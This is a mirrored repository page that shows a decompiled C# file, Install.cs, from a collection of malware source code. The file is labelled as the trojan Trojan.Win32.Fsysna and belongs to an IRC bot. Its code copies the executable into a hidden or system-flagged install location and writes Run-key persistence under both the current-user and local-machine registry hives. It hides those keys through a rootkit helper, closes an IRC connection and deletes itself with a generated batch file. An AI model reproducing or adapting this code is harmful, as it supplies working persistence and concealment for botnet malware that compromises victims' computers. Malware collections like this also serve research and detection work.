ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-12 05:15:28 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a/Install.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

125 lines
3.8 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Hearding_Bot.Install
// Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
namespace Hearding_Bot
{
internal class Install
{
public static bool isInstalled
{
get => File.Exists(Config.installPath + Config.installFile);
set
{
}
}
public static void install()
{
Install.regInstall();
RegistryKey currentUser = Registry.CurrentUser;
currentUser.CreateSubKey(Config.regInfoPath + "\\" + Config.mutex);
RegistryKey registryKey = currentUser.OpenSubKey(Config.regInfoPath + "\\" + Config.mutex, true);
registryKey.SetValue("firstRun", (object) true);
registryKey.SetValue("iDate", (object) DateTime.Now.ToString());
try
{
if (!Directory.Exists(Config.installPath))
Directory.CreateDirectory(Config.installPath);
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Config.installPath + Config.installFile);
if (Config.installFileHidden)
File.SetAttributes(Config.installPath + Config.installFile, FileAttributes.Hidden);
if (!Config.installFileSystem)
return;
File.SetAttributes(Config.installPath + Config.installFile, FileAttributes.System);
}
catch
{
}
}
public static void regInstall()
{
try
{
foreach (string startupKey in Config.startupKeys)
{
RegistryKey subKey = Registry.CurrentUser.CreateSubKey(startupKey);
subKey.SetValue(Config.startupName, (object) (Config.installPath + Config.installFile));
rootkit.HideRegistryKey(subKey);
}
foreach (string startupKey in Config.startupKeys)
{
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(startupKey);
subKey.SetValue(Config.startupName, (object) (Config.installPath + Config.installFile));
rootkit.HideRegistryKey(subKey);
}
}
catch
{
}
}
public static void uninstall(string startup)
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Config.regInfoPath + "\\" + Config.mutex, true);
registryKey.DeleteValue("firstRun");
registryKey.DeleteValue("iDate");
}
catch (Exception ex)
{
}
try
{
foreach (string startupKey in Config.startupKeys)
Registry.CurrentUser.CreateSubKey(startupKey).DeleteValue(Config.startupName);
}
catch (Exception ex)
{
}
try
{
foreach (string startupKey in Config.startupKeys)
Registry.LocalMachine.CreateSubKey(startupKey).DeleteValue(Config.startupName);
}
catch (Exception ex)
{
}
try
{
DeleteFile.SecureDelete(Config.installPath + Config.installFile, 5);
Irc.ircClient.Close();
StreamWriter streamWriter = new StreamWriter(Environment.CurrentDirectory + "uninstall.bat");
streamWriter.WriteLine("del " + Config.installPath + Config.installFile);
streamWriter.WriteLine("del \"" + Assembly.GetExecutingAssembly().Location + "\"");
streamWriter.Close();
Process.Start(Environment.CurrentDirectory + "uninstall.bat");
}
catch (Exception ex)
{
}
if (startup != null)
{
try
{
Process.Start(startup);
}
catch (Exception ex)
{
}
}
Functions.kill();
}
}
}
Reference in New Issue View Git Blame Copy Permalink